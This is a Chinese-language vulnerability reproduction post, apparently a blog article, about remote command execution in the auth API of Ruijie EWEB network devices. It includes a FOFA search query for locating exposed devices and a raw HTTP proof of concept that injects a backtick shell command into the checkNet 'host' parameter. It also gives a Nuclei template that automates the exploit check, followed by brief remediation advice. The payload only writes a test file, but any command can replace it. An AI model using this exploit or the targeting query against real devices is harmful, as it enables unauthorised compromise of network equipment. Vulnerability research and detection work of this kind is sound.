【漏洞复现】锐捷 EWEB auth 远程命令执行漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

                                                                                                                                              

Ⅰ、漏洞描述

锐捷睿易是锐捷网络针对商业市场的子品牌。拥有易网络、交换机、路由器、无线、安全、云服务六大产品线,解决方案涵盖商贸零售、酒店、KTV、网吧、监控安防、物流仓储、制造业、中小教育、中小医疗、中小政府等商业用户。

auth接口存在RCE漏洞,恶意攻击者可能会利用该漏洞执行恶意命令,进而导致服务器失陷。

Ⅱ、fofa语句

body="cgi-bin/luci" && body="#f47f3e"

Ⅲ、漏洞复现

POC

POST /cgi-bin/luci/api/auth HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

{"method":"checkNet","params":{"host":"`echo Hello World!>test.txt`"}}

1、构建poc

2、访问上传文件

http://127.0.0.1/cgi-bin/test.txt

Ⅳ、Nuclei-POC

id: Ruijie-EWEB-auth-REC

info:
  name: auth接口存在RCE漏洞,恶意攻击者可能会利用该漏洞执行恶意命令,进而导致服务器失陷。
  author: WLF
  severity: high
  metadata: 
    fofa-query: body="cgi-bin/luci" && body="#f47f3e"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /cgi-bin/luci/api/auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

        {"method":"checkNet","params":{"host":"`echo Hello World!>{{filename}}.txt`"}}


      - |
        GET /cgi-bin/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"Hello World!")

Ⅴ、修复建议

1、请联系厂商进行修复或升级到安全版本;

2、如非必要,禁止公网访问该系统;

3、设置白名单访问。

  • 29
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
锐捷EG网关和NBR路由器是锐捷公司生产的网络设备,近期被曝出存在命令执行漏洞。 该漏洞的存在使得攻击者能够通过特制的网络请求执行恶意命令,从而导致系统被入侵和控制。其中锐捷EG网关的漏洞编号为CVE-2017-17408,而NBR路由器的漏洞编号为CVE-2017-17409。 攻击者可以通过发送恶意的HTTP请求或者其他网络请求来利用这些漏洞。一旦成功利用,攻击者可以执行任意命令并获取系统权限。这些命令可能包括修改配置、获取敏感信息或者部署其他恶意软件等。 这些漏洞的存在给网络安全带来了潜在的威胁。攻击者可以通过利用这些漏洞对网络设备进行攻击,窃取敏感信息、破坏网络服务或者入侵其他网络设备。 为了解决这些漏洞的问题,锐捷公司已经发布了相应的安全补丁,并且建议用户尽快升级相关设备的固件版本。同时,用户还应该加强网络设备的安全配置,限制对设备的网络访问、设置强密码、及时备份设备配置等。 作为网络设备的用户,我们也应当关注设备厂商的安全公告,定期检查更新并安装相关补丁。此外,加强网络设备的监控和日志记录,及时发现和防范异常行为也是非常重要的。 总之,锐捷EG网关与NBR路由器命令执行漏洞的曝光提醒我们网络安全问题的重要性,需要及时采取相应的措施来保护网络设备和数据的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值